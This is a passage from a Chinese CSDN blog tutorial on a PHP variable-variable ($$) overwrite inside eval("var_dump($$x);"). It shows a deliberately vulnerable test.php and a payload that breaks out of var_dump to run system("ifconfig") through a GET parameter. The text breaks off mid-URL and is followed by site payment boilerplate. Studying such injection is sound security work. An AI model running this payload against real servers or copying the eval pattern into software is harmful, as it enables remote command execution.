php中$$变量覆盖问题

本文探讨了PHP中的$$变量覆盖问题,如何利用此特性绕过`var_dump()`并执行系统命令,如`system()、exec()`等。通过示例展示了payload构造方法,并提到了在Linux系统中写入一句话木马时可能遇到的变量解析问题。
摘要由CSDN通过智能技术生成

一个小的知识点。。。

这里主要是一个关于$$变量覆盖问题和eval("var_dump($x);");中绕过var_dump造成命令执行漏洞的分析

 

我将PHP代码写在test.php文件里了

root@kali:/var/www/html# vi test.php

代码内容:

<?php
$x = $_GET['x'];
eval("var_dump($$x);");
?>

可以发现这里$$x实际就是一个变量覆盖问题,而$x变量又是我们可控的,所以就可以var_dump一些我们想打印的东西,例如payload:

http://192.168.43.242/test.php?x=x=abc

但是现在我想用eval执行一些系统命令,因为有var_dump(),所以我们需要绕过这个函数,执行其他函数,比如:exec()、passthru()、system()、 shell_exec()这些函数能够执行系统命令

 

利用一:

payload: x=x=1);system("ifconfig"

http://192.168.43.242/test.php?x=x=1);system
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值